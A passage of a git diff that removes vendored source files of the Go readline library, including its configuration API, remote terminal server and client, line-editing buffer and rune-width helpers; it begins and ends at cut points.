CharLineEnd - case 'R': - char = CharBckSearch - case 'S': - char = CharFwdSearch - } - } else if r.altKey { - switch char { - case VK_BACK: - char = CharBackspace - } - return r.writeEsc(buf, char) - } - return r.write(buf, char) -} - -func (r *RawReader) writeEsc(b []byte, char rune) (int, error) { - b[0] = '\033' - n := copy(b[1:], []byte(string(char))) - return n + 1, nil -} - -func (r *RawReader) write(b []byte, char rune) (int, error) { - n := copy(b, []byte(string(char))) - return n, nil -} - -func (r *RawReader) Close() error { - return nil -} diff --git a/vendor/github.com/chzyer/readline/readline.go b/vendor/github.com/chzyer/readline/readline.go deleted file mode 100644 index b0242f77..00000000 --- a/vendor/github.com/chzyer/readline/readline.go +++ /dev/null @@ -1,288 +0,0 @@ -// Readline is a pure go implementation for GNU-Readline kind library. -// -// example: -// rl, err := readline.New("> ") -// if err != nil { -// panic(err) -// } -// defer rl.Close() -// -// for { -// line, err := rl.Readline() -// if err != nil { // io.EOF -// break -// } -// println(line) -// } -// -package readline - -import "io" - -type Instance struct { - Config *Config - Terminal *Terminal - Operation *Operation -} - -type Config struct { - // prompt supports ANSI escape sequence, so we can color some characters even in windows - Prompt string - - // readline will persist historys to file where HistoryFile specified - HistoryFile string - // specify the max length of historys, it's 500 by default, set it to -1 to disable history - HistoryLimit int - DisableAutoSaveHistory bool - // enable case-insensitive history searching - HistorySearchFold bool - - // AutoCompleter will called once user press TAB - AutoComplete AutoCompleter - - // Any key press will pass to Listener - // NOTE: Listener will be triggered by (nil, 0, 0) immediately - Listener Listener - - // If VimMode is true, readline will in vim.insert mode by default - VimMode bool - - InterruptPrompt string - EOFPrompt string - - FuncGetWidth func() int - - Stdin io.Reader - Stdout io.Writer - Stderr io.Writer - - EnableMask bool - MaskRune rune - - // erase the editing line after user submited it - // it use in IM usually. - UniqueEditLine bool - - // filter input runes (may be used to disable CtrlZ or for translating some keys to different actions) - // -> output = new (translated) rune and true/false if continue with processing this one - FuncFilterInputRune func(rune) (rune, bool) - - // force use interactive even stdout is not a tty - FuncIsTerminal func() bool - FuncMakeRaw func() error - FuncExitRaw func() error - FuncOnWidthChanged func(func()) - ForceUseInteractive bool - - // private fields - inited bool - opHistory *opHistory - opSearch *opSearch -} - -func (c *Config) useInteractive() bool { - if c.ForceUseInteractive { - return true - } - return c.FuncIsTerminal() -} - -func (c *Config) Init() error { - if c.inited { - return nil - } - c.inited = true - if c.Stdin == nil { - c.Stdin = NewCancelableStdin(Stdin) - } - if c.Stdout == nil { - c.Stdout = Stdout - } - if c.Stderr == nil { - c.Stderr = Stderr - } - if c.HistoryLimit == 0 { - c.HistoryLimit = 500 - } - - if c.InterruptPrompt == "" { - c.InterruptPrompt = "^C" - } else if c.InterruptPrompt == "\n" { - c.InterruptPrompt = "" - } - if c.EOFPrompt == "" { - c.EOFPrompt = "^D" - } else if c.EOFPrompt == "\n" { - c.EOFPrompt = "" - } - - if c.AutoComplete == nil { - c.AutoComplete = &TabCompleter{} - } - if c.FuncGetWidth == nil { - c.FuncGetWidth = GetScreenWidth - } - if c.FuncIsTerminal == nil { - c.FuncIsTerminal = DefaultIsTerminal - } - rm := new(RawMode) - if c.FuncMakeRaw == nil { - c.FuncMakeRaw = rm.Enter - } - if c.FuncExitRaw == nil { - c.FuncExitRaw = rm.Exit - } - if c.FuncOnWidthChanged == nil { - c.FuncOnWidthChanged = DefaultOnWidthChanged - } - - return nil -} - -func (c Config) Clone() *Config { - c.opHistory = nil - c.opSearch = nil - return &c -} - -func (c *Config) SetListener(f func(line []rune, pos int, key rune) (newLine []rune, newPos int, ok bool)) { - c.Listener = FuncListener(f) -} - -func NewEx(cfg *Config) (*Instance, error) { - t, err := NewTerminal(cfg) - if err != nil { - return nil, err - } - rl := t.Readline() - return &Instance{ - Config: cfg, - Terminal: t, - Operation: rl, - }, nil -} - -func New(prompt string) (*Instance, error) { - return NewEx(&Config{Prompt: prompt}) -} - -func (i *Instance) ResetHistory() { - i.Operation.ResetHistory() -} - -func (i *Instance) SetPrompt(s string) { - i.Operation.SetPrompt(s) -} - -func (i *Instance) SetMaskRune(r rune) { - i.Operation.SetMaskRune(r) -} - -// change history persistence in runtime -func (i *Instance) SetHistoryPath(p string) { - i.Operation.SetHistoryPath(p) -} - -// readline will refresh automatic when write through Stdout() -func (i *Instance) Stdout() io.Writer { - return i.Operation.Stdout() -} - -// readline will refresh automatic when write through Stdout() -func (i *Instance) Stderr() io.Writer { - return i.Operation.Stderr() -} - -// switch VimMode in runtime -func (i *Instance) SetVimMode(on bool) { - i.Operation.SetVimMode(on) -} - -func (i *Instance) IsVimMode() bool { - return i.Operation.IsEnableVimMode() -} - -func (i *Instance) GenPasswordConfig() *Config { - return i.Operation.GenPasswordConfig() -} - -// we can generate a config by `i.GenPasswordConfig()` -func (i *Instance) ReadPasswordWithConfig(cfg *Config) ([]byte, error) { - return i.Operation.PasswordWithConfig(cfg) -} - -func (i *Instance) ReadPasswordEx(prompt string, l Listener) ([]byte, error) { - return i.Operation.PasswordEx(prompt, l) -} - -func (i *Instance) ReadPassword(prompt string) ([]byte, error) { - return i.Operation.Password(prompt) -} - -type Result struct { - Line string - Error error -} - -func (l *Result) CanContinue() bool { - return len(l.Line) != 0 && l.Error == ErrInterrupt -} - -func (l *Result) CanBreak() bool { - return !l.CanContinue() && l.Error != nil -} - -func (i *Instance) Line() *Result { - ret, err := i.Readline() - return &Result{ret, err} -} - -// err is one of (nil, io.EOF, readline.ErrInterrupt) -func (i *Instance) Readline() (string, error) { - return i.Operation.String() -} - -func (i *Instance) ReadlineWithDefault(what string) (string, error) { - i.Operation.SetBuffer(what) - return i.Operation.String() -} - -func (i *Instance) SaveHistory(content string) error { - return i.Operation.SaveHistory(content) -} - -// same as readline -func (i *Instance) ReadSlice() ([]byte, error) { - return i.Operation.Slice() -} - -// we must make sure that call Close() before process exit. -func (i *Instance) Close() error { - if err := i.Terminal.Close(); err != nil { - return err - } - i.Operation.Close() - return nil -} -func (i *Instance) Clean() { - i.Operation.Clean() -} - -func (i *Instance) Write(b []byte) (int, error) { - return i.Stdout().Write(b) -} - -func (i *Instance) SetConfig(cfg *Config) *Config { - if i.Config == cfg { - return cfg - } - old := i.Config - i.Config = cfg - i.Operation.SetConfig(cfg) - i.Terminal.SetConfig(cfg) - return old -} - -func (i *Instance) Refresh() { - i.Operation.Refresh() -} diff --git a/vendor/github.com/chzyer/readline/remote.go b/vendor/github.com/chzyer/readline/remote.go deleted file mode 100644 index db77ae8c..00000000 --- a/vendor/github.com/chzyer/readline/remote.go +++ /dev/null @@ -1,474 +0,0 @@ -package readline - -import ( - "bufio" - "bytes" - "encoding/binary" - "fmt" - "io" - "net" - "os" - "sync" - "sync/atomic" -) - -type MsgType int16 - -const ( - T_DATA = MsgType(iota) - T_WIDTH - T_WIDTH_REPORT - T_ISTTY_REPORT - T_RAW - T_ERAW // exit raw - T_EOF -) - -type RemoteSvr struct { - eof int32 - closed int32 - width int32 - reciveChan chan struct{} - writeChan chan *writeCtx - conn net.Conn - isTerminal bool - funcWidthChan func() - stopChan chan struct{} - - dataBufM sync.Mutex - dataBuf bytes.Buffer -} - -type writeReply struct { - n int - err error -} - -type writeCtx struct { - msg *Message - reply chan *writeReply -} - -func newWriteCtx(msg *Message) *writeCtx { - return &writeCtx{ - msg: msg, - reply: make(chan *writeReply), - } -} - -func NewRemoteSvr(conn net.Conn) (*RemoteSvr, error) { - rs := &RemoteSvr{ - width: -1, - conn: conn, - writeChan: make(chan *writeCtx), - reciveChan: make(chan struct{}), - stopChan: make(chan struct{}), - } - buf := bufio.NewReader(rs.conn) - - if err := rs.init(buf); err != nil { - return nil, err - } - - go rs.readLoop(buf) - go rs.writeLoop() - return rs, nil -} - -func (r *RemoteSvr) init(buf *bufio.Reader) error { - m, err := ReadMessage(buf) - if err != nil { - return err - } - // receive isTerminal - if m.Type != T_ISTTY_REPORT { - return fmt.Errorf("unexpected init message") - } - r.GotIsTerminal(m.Data) - - // receive width - m, err = ReadMessage(buf) - if err != nil { - return err - } - if m.Type != T_WIDTH_REPORT { - return fmt.Errorf("unexpected init message") - } - r.GotReportWidth(m.Data) - - return nil -} - -func (r *RemoteSvr) HandleConfig(cfg *Config) { - cfg.Stderr = r - cfg.Stdout = r - cfg.Stdin = r - cfg.FuncExitRaw = r.ExitRawMode - cfg.FuncIsTerminal = r.IsTerminal - cfg.FuncMakeRaw = r.EnterRawMode - cfg.FuncExitRaw = r.ExitRawMode - cfg.FuncGetWidth = r.GetWidth - cfg.FuncOnWidthChanged = func(f func()) { - r.funcWidthChan = f - } -} - -func (r *RemoteSvr) IsTerminal() bool { - return r.isTerminal -} - -func (r *RemoteSvr) checkEOF() error { - if atomic.LoadInt32(&r.eof) == 1 { - return io.EOF - } - return nil -} - -func (r *RemoteSvr) Read(b []byte) (int, error) { - r.dataBufM.Lock() - n, err := r.dataBuf.Read(b) - r.dataBufM.Unlock() - if n == 0 { - if err := r.checkEOF(); err != nil { - return 0, err - } - } - - if n == 0 && err == io.EOF { - <-r.reciveChan - r.dataBufM.Lock() - n, err = r.dataBuf.Read(b) - r.dataBufM.Unlock() - } - if n == 0 { - if err := r.checkEOF(); err != nil { - return 0, err - } - } - - return n, err -} - -func (r *RemoteSvr) writeMsg(m *Message) error { - ctx := newWriteCtx(m) - r.writeChan <- ctx - reply := <-ctx.reply - return reply.err -} - -func (r *RemoteSvr) Write(b []byte) (int, error) { - ctx := newWriteCtx(NewMessage(T_DATA, b)) - r.writeChan <- ctx - reply := <-ctx.reply - return reply.n, reply.err -} - -func (r *RemoteSvr) EnterRawMode() error { - return r.writeMsg(NewMessage(T_RAW, nil)) -} - -func (r *RemoteSvr) ExitRawMode() error { - return r.writeMsg(NewMessage(T_ERAW, nil)) -} - -func (r *RemoteSvr) writeLoop() { - defer r.Close() - -loop: - for { - select { - case ctx, ok := <-r.writeChan: - if !ok { - break - } - n, err := ctx.msg.WriteTo(r.conn) - ctx.reply <- &writeReply{n, err} - case <-r.stopChan: - break loop - } - } -} - -func (r *RemoteSvr) Close() { - if atomic.CompareAndSwapInt32(&r.closed, 0, 1) { - close(r.stopChan) - r.conn.Close() - } -} - -func (r *RemoteSvr) readLoop(buf *bufio.Reader) { - defer r.Close() - for { - m, err := ReadMessage(buf) - if err != nil { - break - } - switch m.Type { - case T_EOF: - atomic.StoreInt32(&r.eof, 1) - select { - case r.reciveChan <- struct{}{}: - default: - } - case T_DATA: - r.dataBufM.Lock() - r.dataBuf.Write(m.Data) - r.dataBufM.Unlock() - select { - case r.reciveChan <- struct{}{}: - default: - } - case T_WIDTH_REPORT: - r.GotReportWidth(m.Data) - case T_ISTTY_REPORT: - r.GotIsTerminal(m.Data) - } - } -} - -func (r *RemoteSvr) GotIsTerminal(data []byte) { - if binary.BigEndian.Uint16(data) == 0 { - r.isTerminal = false - } else { - r.isTerminal = true - } -} - -func (r *RemoteSvr) GotReportWidth(data []byte) { - atomic.StoreInt32(&r.width, int32(binary.BigEndian.Uint16(data))) - if r.funcWidthChan != nil { - r.funcWidthChan() - } -} - -func (r *RemoteSvr) GetWidth() int { - return int(atomic.LoadInt32(&r.width)) -} - -// ----------------------------------------------------------------------------- - -type Message struct { - Type MsgType - Data []byte -} - -func ReadMessage(r io.Reader) (*Message, error) { - m := new(Message) - var length int32 - if err := binary.Read(r, binary.BigEndian, &length); err != nil { - return nil, err - } - if err := binary.Read(r, binary.BigEndian, &m.Type); err != nil { - return nil, err - } - m.Data = make([]byte, int(length)-2) - if _, err := io.ReadFull(r, m.Data); err != nil { - return nil, err - } - return m, nil -} - -func NewMessage(t MsgType, data []byte) *Message { - return &Message{t, data} -} - -func (m *Message) WriteTo(w io.Writer) (int, error) { - buf := bytes.NewBuffer(make([]byte, 0, len(m.Data)+2+4)) - binary.Write(buf, binary.BigEndian, int32(len(m.Data)+2)) - binary.Write(buf, binary.BigEndian, m.Type) - buf.Write(m.Data) - n, err := buf.WriteTo(w) - return int(n), err -} - -// ----------------------------------------------------------------------------- - -type RemoteCli struct { - conn net.Conn - raw RawMode - receiveChan chan struct{} - inited int32 - isTerminal *bool - - data bytes.Buffer - dataM sync.Mutex -} - -func NewRemoteCli(conn net.Conn) (*RemoteCli, error) { - r := &RemoteCli{ - conn: conn, - receiveChan: make(chan struct{}), - } - return r, nil -} - -func (r *RemoteCli) MarkIsTerminal(is bool) { - r.isTerminal = &is -} - -func (r *RemoteCli) init() error { - if !atomic.CompareAndSwapInt32(&r.inited, 0, 1) { - return nil - } - - if err := r.reportIsTerminal(); err != nil { - return err - } - - if err := r.reportWidth(); err != nil { - return err - } - - // register sig for width changed - DefaultOnWidthChanged(func() { - r.reportWidth() - }) - return nil -} - -func (r *RemoteCli) writeMsg(m *Message) error { - r.dataM.Lock() - _, err := m.WriteTo(r.conn) - r.dataM.Unlock() - return err -} - -func (r *RemoteCli) Write(b []byte) (int, error) { - m := NewMessage(T_DATA, b) - r.dataM.Lock() - _, err := m.WriteTo(r.conn) - r.dataM.Unlock() - return len(b), err -} - -func (r *RemoteCli) reportWidth() error { - screenWidth := GetScreenWidth() - data := make([]byte, 2) - binary.BigEndian.PutUint16(data, uint16(screenWidth)) - msg := NewMessage(T_WIDTH_REPORT, data) - - if err := r.writeMsg(msg); err != nil { - return err - } - return nil -} - -func (r *RemoteCli) reportIsTerminal() error { - var isTerminal bool - if r.isTerminal != nil { - isTerminal = *r.isTerminal - } else { - isTerminal = DefaultIsTerminal() - } - data := make([]byte, 2) - if isTerminal { - binary.BigEndian.PutUint16(data, 1) - } else { - binary.BigEndian.PutUint16(data, 0) - } - msg := NewMessage(T_ISTTY_REPORT, data) - if err := r.writeMsg(msg); err != nil { - return err - } - return nil -} - -func (r *RemoteCli) readLoop() { - buf := bufio.NewReader(r.conn) - for { - msg, err := ReadMessage(buf) - if err != nil { - break - } - switch msg.Type { - case T_ERAW: - r.raw.Exit() - case T_RAW: - r.raw.Enter() - case T_DATA: - os.Stdout.Write(msg.Data) - } - } -} - -func (r *RemoteCli) ServeBy(source io.Reader) error { - if err := r.init(); err != nil { - return err - } - - go func() { - defer r.Close() - for { - n, _ := io.Copy(r, source) - if n == 0 { - break - } - } - }() - defer r.raw.Exit() - r.readLoop() - return nil -} - -func (r *RemoteCli) Close() { - r.writeMsg(NewMessage(T_EOF, nil)) -} - -func (r *RemoteCli) Serve() error { - return r.ServeBy(os.Stdin) -} - -func ListenRemote(n, addr string, cfg *Config, h func(*Instance), onListen ...func(net.Listener) error) error { - ln, err := net.Listen(n, addr) - if err != nil { - return err - } - if len(onListen) > 0 { - if err := onListen[0](ln); err != nil { - return err - } - } - for { - conn, err := ln.Accept() - if err != nil { - break - } - go func() { - defer conn.Close() - rl, err := HandleConn(*cfg, conn) - if err != nil { - return - } - h(rl) - }() - } - return nil -} - -func HandleConn(cfg Config, conn net.Conn) (*Instance, error) { - r, err := NewRemoteSvr(conn) - if err != nil { - return nil, err - } - r.HandleConfig(&cfg) - - rl, err := NewEx(&cfg) - if err != nil { - return nil, err - } - return rl, nil -} - -func DialRemote(n, addr string) error { - conn, err := net.Dial(n, addr) - if err != nil { - return err - } - defer conn.Close() - - cli, err := NewRemoteCli(conn) - if err != nil { - return err - } - return cli.Serve() -} diff --git a/vendor/github.com/chzyer/readline/runebuf.go b/vendor/github.com/chzyer/readline/runebuf.go deleted file mode 100644 index 1b2a5d04..00000000 --- a/vendor/github.com/chzyer/readline/runebuf.go +++ /dev/null @@ -1,572 +0,0 @@ -package readline - -import ( - "bufio" - "bytes" - "io" - "strings" - "sync" -) - -type runeBufferBck struct { - buf []rune - idx int -} - -type RuneBuffer struct { - buf []rune - idx int - prompt []rune - w io.Writer - - hadClean bool - interactive bool - cfg *Config - - width int - - bck *runeBufferBck - - offset string - - sync.Mutex -} - -func (r *RuneBuffer) OnWidthChange(newWidth int) { - r.Lock() - r.width = newWidth - r.Unlock() -} - -func (r *RuneBuffer) Backup() { - r.Lock() - r.bck = &runeBufferBck{r.buf, r.idx} - r.Unlock() -} - -func (r *RuneBuffer) Restore() { - r.Refresh(func() { - if r.bck == nil { - return - } - r.buf = r.bck.buf - r.idx = r.bck.idx - }) -} - -func NewRuneBuffer(w io.Writer, prompt string, cfg *Config, width int) *RuneBuffer { - rb := &RuneBuffer{ - w: w, - interactive: cfg.useInteractive(), - cfg: cfg, - width: width, - } - rb.SetPrompt(prompt) - return rb -} - -func (r *RuneBuffer) SetConfig(cfg *Config) { - r.Lock() - r.cfg = cfg - r.interactive = cfg.useInteractive() - r.Unlock() -} - -func (r *RuneBuffer) SetMask(m rune) { - r.Lock() - r.cfg.MaskRune = m - r.Unlock() -} - -func (r *RuneBuffer) CurrentWidth(x int) int { - r.Lock() - defer r.Unlock() - return runes.WidthAll(r.buf[:x]) -} - -func (r *RuneBuffer) PromptLen() int { - r.Lock() - width := r.promptLen() - r.Unlock() - return width -} - -func (r *RuneBuffer) promptLen() int { - return runes.WidthAll(runes.ColorFilter(r.prompt)) -} - -func (r *RuneBuffer) RuneSlice(i int) []rune { - r.Lock() - defer r.Unlock() - - if i > 0 { - rs := make([]rune, i) - copy(rs, r.buf[r.idx:r.idx+i]) - return rs - } - rs := make([]rune, -i) - copy(rs, r.buf[r.idx+i:r.idx]) - return rs -} - -func (r *RuneBuffer) Runes() []rune { - r.Lock() - newr := make([]rune, len(r.buf)) - copy(newr, r.buf) - r.Unlock() - return newr -} - -func (r *RuneBuffer) Pos() int { - r.Lock() - defer r.Unlock() - return r.idx -} - -func (r *RuneBuffer) Len() int { - r.Lock() - defer r.Unlock() - return len(r.buf) -} - -func (r *RuneBuffer) MoveToLineStart() { - r.Refresh(func() { - if r.idx == 0 { - return - } - r.idx = 0 - }) -} - -func (r *RuneBuffer) MoveBackward() { - r.Refresh(func() { - if r.idx == 0 { - return - } - r.idx-- - }) -} - -func (r *RuneBuffer) WriteString(s string) { - r.WriteRunes([]rune(s)) -} - -func (r *RuneBuffer) WriteRune(s rune) { - r.WriteRunes([]rune{s}) -} - -func (r *RuneBuffer) WriteRunes(s []rune) { - r.Refresh(func() { - tail := append(s, r.buf[r.idx:]...) - r.buf = append(r.buf[:r.idx], tail...) - r.idx += len(s) - }) -} - -func (r *RuneBuffer) MoveForward() { - r.Refresh(func() { - if r.idx == len(r.buf) { - return - } - r.idx++ - }) -} - -func (r *RuneBuffer) IsCursorInEnd() bool { - r.Lock() - defer r.Unlock() - return r.idx == len(r.buf) -} - -func (r *RuneBuffer) Replace(ch rune) { - r.Refresh(func() { - r.buf[r.idx] = ch - }) -} - -func (r *RuneBuffer) Erase() { - r.Refresh(func() { - r.idx = 0 - r.buf = r.buf[:0] - }) -} - -func (r *RuneBuffer) Delete() (success bool) { - r.Refresh(func() { - if r.idx == len(r.buf) { - return - } - r.buf = append(r.buf[:r.idx], r.buf[r.idx+1:]...) - success = true - }) - return -} - -func (r *RuneBuffer) DeleteWord() { - if r.idx == len(r.buf) { - return - } - init := r.idx - for init < len(r.buf) && IsWordBreak(r.buf[init]) { - init++ - } - for i := init + 1; i < len(r.buf); i++ { - if !IsWordBreak(r.buf[i]) && IsWordBreak(r.buf[i-1]) { - r.Refresh(func() { - r.buf = append(r.buf[:r.idx], r.buf[i-1:]...) - }) - return - } - } - r.Kill() -} - -func (r *RuneBuffer) MoveToPrevWord() (success bool) { - r.Refresh(func() { - if r.idx == 0 { - return - } - - for i := r.idx - 1; i > 0; i-- { - if !IsWordBreak(r.buf[i]) && IsWordBreak(r.buf[i-1]) { - r.idx = i - success = true - return - } - } - r.idx = 0 - success = true - }) - return -} - -func (r *RuneBuffer) KillFront() { - r.Refresh(func() { - if r.idx == 0 { - return - } - - length := len(r.buf) - r.idx - copy(r.buf[:length], r.buf[r.idx:]) - r.idx = 0 - r.buf = r.buf[:length] - }) -} - -func (r *RuneBuffer) Kill() { - r.Refresh(func() { - r.buf = r.buf[:r.idx] - }) -} - -func (r *RuneBuffer) Transpose() { - r.Refresh(func() { - if len(r.buf) == 1 { - r.idx++ - } - - if len(r.buf) < 2 { - return - } - - if r.idx == 0 { - r.idx = 1 - } else if r.idx >= len(r.buf) { - r.idx = len(r.buf) - 1 - } - r.buf[r.idx], r.buf[r.idx-1] = r.buf[r.idx-1], r.buf[r.idx] - r.idx++ - }) -} - -func (r *RuneBuffer) MoveToNextWord() { - r.Refresh(func() { - for i := r.idx + 1; i < len(r.buf); i++ { - if !IsWordBreak(r.buf[i]) && IsWordBreak(r.buf[i-1]) { - r.idx = i - return - } - } - - r.idx = len(r.buf) - }) -} - -func (r *RuneBuffer) MoveToEndWord() { - r.Refresh(func() { - // already at the end, so do nothing - if r.idx == len(r.buf) { - return - } - // if we are at the end of a word already, go to next - if !IsWordBreak(r.buf[r.idx]) && IsWordBreak(r.buf[r.idx+1]) { - r.idx++ - } - - // keep going until at the end of a word - for i := r.idx + 1; i < len(r.buf); i++ { - if IsWordBreak(r.buf[i]) && !IsWordBreak(r.buf[i-1]) { - r.idx = i - 1 - return - } - } - r.idx = len(r.buf) - }) -} - -func (r *RuneBuffer) BackEscapeWord() { - r.Refresh(func() { - if r.idx == 0 { - return - } - for i := r.idx - 1; i > 0; i-- { - if !IsWordBreak(r.buf[i]) && IsWordBreak(r.buf[i-1]) { - r.buf = append(r.buf[:i], r.buf[r.idx:]...) - r.idx = i - return - } - } - - r.buf = r.buf[:0] - r.idx = 0 - }) -} - -func (r *RuneBuffer) Backspace() { - r.Refresh(func() { - if r.idx == 0 { - return - } - - r.idx-- - r.buf = append(r.buf[:r.idx], r.buf[r.idx+1:]...) - }) -} - -func (r *RuneBuffer) MoveToLineEnd() { - r.Refresh(func() { - if r.idx == len(r.buf) { - return - } - - r.idx = len(r.buf) - }) -} - -func (r *RuneBuffer) LineCount(width int) int { - if width == -1 { - width = r.width - } - return LineCount(width, - runes.WidthAll(r.buf)+r.PromptLen()) -} - -func (r *RuneBuffer) MoveTo(ch rune, prevChar, reverse bool) (success bool) { - r.Refresh(func() { - if reverse { - for i := r.idx - 1; i >= 0; i-- { - if r.buf[i] == ch { - r.idx = i - if prevChar { - r.idx++ - } - success = true - return - } - } - return - } - for i := r.idx + 1; i < len(r.buf); i++ { - if r.buf[i] == ch { - r.idx = i - if prevChar { - r.idx-- - } - success = true - return - } - } - }) - return -} - -func (r *RuneBuffer) isInLineEdge() bool { - if isWindows { - return false - } - sp := r.getSplitByLine(r.buf) - return len(sp[len(sp)-1]) == 0 -} - -func (r *RuneBuffer) getSplitByLine(rs []rune) []string { - return SplitByLine(r.promptLen(), r.width, rs) -} - -func (r *RuneBuffer) IdxLine(width int) int { - r.Lock() - defer r.Unlock() - return r.idxLine(width) -} - -func (r *RuneBuffer) idxLine(width int) int { - if width == 0 { - return 0 - } - sp := r.getSplitByLine(r.buf[:r.idx]) - return len(sp) - 1 -} - -func (r *RuneBuffer) CursorLineCount() int { - return r.LineCount(r.width) - r.IdxLine(r.width) -} - -func (r *RuneBuffer) Refresh(f func()) { - r.Lock() - defer r.Unlock() - - if !r.interactive { - if f != nil { - f() - } - return - } - - r.clean() - if f != nil { - f() - } - r.print() -} - -func (r *RuneBuffer) SetOffset(offset string) { - r.Lock() - r.offset = offset - r.Unlock() -} - -func (r *RuneBuffer) print() { - r.w.Write(r.output()) - r.hadClean = false -} - -func (r *RuneBuffer) output() []byte { - buf := bytes.NewBuffer(nil) - buf.WriteString(string(r.prompt)) - if r.cfg.EnableMask && len(r.buf) > 0 { - buf.Write([]byte(strings.Repeat(string(r.cfg.MaskRune), len(r.buf)-1))) - if r.buf[len(r.buf)-1] == '\n' { - buf.Write([]byte{'\n'}) - } else { - buf.Write([]byte(string(r.cfg.MaskRune))) - } - if len(r.buf) > r.idx { - buf.Write(runes.Backspace(r.buf[r.idx:])) - } - - } else { - for idx := range r.buf { - if r.buf[idx] == '\t' { - buf.WriteString(strings.Repeat(" ", TabWidth)) - } else { - buf.WriteRune(r.buf[idx]) - } - } - if r.isInLineEdge() { - buf.Write([]byte(" \b")) - } - } - - if len(r.buf) > r.idx { - buf.Write(runes.Backspace(r.buf[r.idx:])) - } - return buf.Bytes() -} - -func (r *RuneBuffer) Reset() []rune { - ret := runes.Copy(r.buf) - r.buf = r.buf[:0] - r.idx = 0 - return ret -} - -func (r *RuneBuffer) calWidth(m int) int { - if m > 0 { - return runes.WidthAll(r.buf[r.idx : r.idx+m]) - } - return runes.WidthAll(r.buf[r.idx+m : r.idx]) -} - -func (r *RuneBuffer) SetStyle(start, end int, style string) { - if end < start { - panic("end < start") - } - - // goto start - move := start - r.idx - if move > 0 { - r.w.Write([]byte(string(r.buf[r.idx : r.idx+move]))) - } else { - r.w.Write(bytes.Repeat([]byte("\b"), r.calWidth(move))) - } - r.w.Write([]byte("\033[" + style + "m")) - r.w.Write([]byte(string(r.buf[start:end]))) - r.w.Write([]byte("\033[0m")) - // TODO: move back -} - -func (r *RuneBuffer) SetWithIdx(idx int, buf []rune) { - r.Refresh(func() { - r.buf = buf - r.idx = idx - }) -} - -func (r *RuneBuffer) Set(buf []rune) { - r.SetWithIdx(len(buf), buf) -} - -func (r *RuneBuffer) SetPrompt(prompt string) { - r.Lock() - r.prompt = []rune(prompt) - r.Unlock() -} - -func (r *RuneBuffer) cleanOutput(w io.Writer, idxLine int) { - buf := bufio.NewWriter(w) - - if r.width == 0 { - buf.WriteString(strings.Repeat("\r\b", len(r.buf)+r.promptLen())) - buf.Write([]byte("\033[J")) - } else { - buf.Write([]byte("\033[J")) // just like ^k :) - if idxLine == 0 { - buf.WriteString("\033[2K") - buf.WriteString("\r") - } else { - for i := 0; i < idxLine; i++ { - io.WriteString(buf, "\033[2K\r\033[A") - } - io.WriteString(buf, "\033[2K\r") - } - } - buf.Flush() - return -} - -func (r *RuneBuffer) Clean() { - r.Lock() - r.clean() - r.Unlock() -} - -func (r *RuneBuffer) clean() { - r.cleanWithIdxLine(r.idxLine(r.width)) -} - -func (r *RuneBuffer) cleanWithIdxLine(idxLine int) { - if r.hadClean || !r.interactive { - return - } - r.hadClean = true - r.cleanOutput(r.w, idxLine) -} diff --git a/vendor/github.com/chzyer/readline/runes.go b/vendor/github.com/chzyer/readline/runes.go deleted file mode 100644 index a669bc48..00000000 --- a/vendor/github.com/chzyer/readline/runes.go +++ /dev/null @@ -1,223 +0,0 @@ -package readline - -import ( - "bytes" - "unicode" - "unicode/utf8" -) - -var runes = Runes{} -var TabWidth = 4 - -type Runes struct{} - -func (Runes) EqualRune(a, b rune, fold bool) bool { - if a == b { - return true - } - if !fold { - return false - } - if a > b { - a, b = b, a - } - if b < utf8.RuneSelf && 'A' <= a && a <= 'Z' { - if b == a+'a'-'A' { - return true - } - } - return false -} - -func (r Runes) EqualRuneFold(a, b rune) bool { - return r.EqualRune(a, b, true) -} - -func (r Runes) EqualFold(a, b []rune) bool { - if len(a) != len(b) { - return false - } - for i := 0; i < len(a); i++ { - if r.EqualRuneFold(a[i], b[i]) { - continue - } - return false - } - - return true -} - -func (Runes) Equal(a, b []rune) bool { - if len(a) != len(b) { - return false - } - for i := 0; i < len(a); i++ { - if a[i] != b[i] { - return false - } - } - return true -} - -func (rs Runes) IndexAllBckEx(r, sub []rune, fold bool) int { - for i := len(r) - len(sub); i >= 0; i-- { - found := true - for j := 0; j < len(sub); j++ { - if !rs.EqualRune(r[i+j], sub[j], fold) { - found = false - break - } - } - if found { - return i - } - } - return -1 -} - -// Search in runes from end to front -func (rs Runes) IndexAllBck(r, sub []rune) int { - return rs.IndexAllBckEx(r, sub, false) -} - -// Search in runes from front to end -func (rs Runes) IndexAll(r, sub []rune) int { - return rs.IndexAllEx(r, sub, false) -} - -func (rs Runes) IndexAllEx(r, sub []rune, fold bool) int { - for i := 0; i < len(r); i++ { - found := true - if len(r[i:]) < len(sub) { - return -1 - } - for j := 0; j < len(sub); j++ { - if !rs.EqualRune(r[i+j], sub[j], fold) { - found = false - break - } - } - if found { - return i - } - } - return -1 -} - -func (Runes) Index(r rune, rs []rune) int { - for i := 0; i < len(rs); i++ { - if rs[i] == r { - return i - } - } - return -1 -} - -func (Runes) ColorFilter(r []rune) []rune { - newr := make([]rune, 0, len(r)) - for pos := 0; pos < len(r); pos++ { - if r[pos] == '\033' && r[pos+1] == '[' { - idx := runes.Index('m', r[pos+2:]) - if idx == -1 { - continue - } - pos += idx + 2 - continue - } - newr = append(newr, r[pos]) - } - return newr -} - -var zeroWidth = []*unicode.RangeTable{ - unicode.Mn, - unicode.Me, - unicode.Cc, - unicode.Cf, -} - -var doubleWidth = []*unicode.RangeTable{ - unicode.Han, - unicode.Hangul, - unicode.Hiragana, - unicode.Katakana, -} - -func (Runes) Width(r rune) int { - if r == '\t' { - return TabWidth - } - if unicode.IsOneOf(zeroWidth, r) { - return 0 - } - if unicode.IsOneOf(doubleWidth, r) { - return 2 - } - return 1 -} - -func (Runes) WidthAll(r []rune) (length int) { - for i := 0; i < len(r); i++ { - length += runes.Width(r[i]) - } - return -} - -func (Runes) Backspace(r []rune) []byte { - return bytes.Repeat([]byte{'\b'}, runes.WidthAll(r)) -} - -func (Runes) Copy(r []rune) []rune { - n := make([]rune, len(r)) - copy(n, r) - return n -} - -func (Runes) HasPrefixFold(r, prefix []rune) bool { - if len(r) < len(prefix) { - return false - } - return runes.EqualFold(r[:len(prefix)], prefix) -} - -func (Runes) HasPrefix(r, prefix []rune) bool { - if len(r) < len(prefix) { - return false - } - return runes.Equal(r[:len(prefix)], prefix) -} - -func (Runes) Aggregate(candicate [][]rune) (same []rune, size int) { - for i := 0; i < len(candicate[0]); i++ { - for j := 0; j < len(candicate)-1; j++ { - if i >= len(candicate[j]) || i >= len(candicate[j+1]) { - goto aggregate - } - if candicate[j][i] != candicate[j+1][i] { - goto aggregate - } - } - size = i + 